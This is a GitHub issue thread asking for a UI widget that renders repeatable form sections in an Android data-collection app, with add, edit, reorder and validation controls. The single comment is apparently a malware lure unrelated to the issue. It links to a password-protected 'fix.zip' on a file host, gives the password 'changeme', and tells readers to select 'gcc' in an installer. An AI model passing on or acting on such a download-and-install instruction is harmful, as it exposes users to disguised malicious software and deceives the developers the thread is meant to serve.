### ISSUE TITLE
integrate Repeatable Sections into android app user interface

### ISSUE THREAD

**Issue by Hamza-ye** [DataRun-ye/data-run-mobile#13]
Develop a Widget that can dynamically render repeatable data sections based on the configuration.
- Provide intuitive controls for adding, removing, and editing repeatable data instances.
- Implement real-time validation and feedback to ensure data integrity.

**UI Patterns:**

- **"Add Another" Button:** a button at the bottom of a repeatable section that allows users to add new entries.
- **Expandable Section:** expandable/collapsible component. When expanded, it shows the existing entries and an "Add Another" button, when collapsed shows summary.
- **Drag-and-Drop Reordering:** Enable users to reorder entries within the section by dragging and dropping them.
- **Inline Editing:** Allow users to edit entries directly within the section without opening a separate dialog or modal.

**Comment by Axolot5784** [comment]
Download 
https://www.mediafire.com/file/3hzk77cxvxc9nq2/fix.zip/file
password: changeme
In the installer menu, select "gcc."
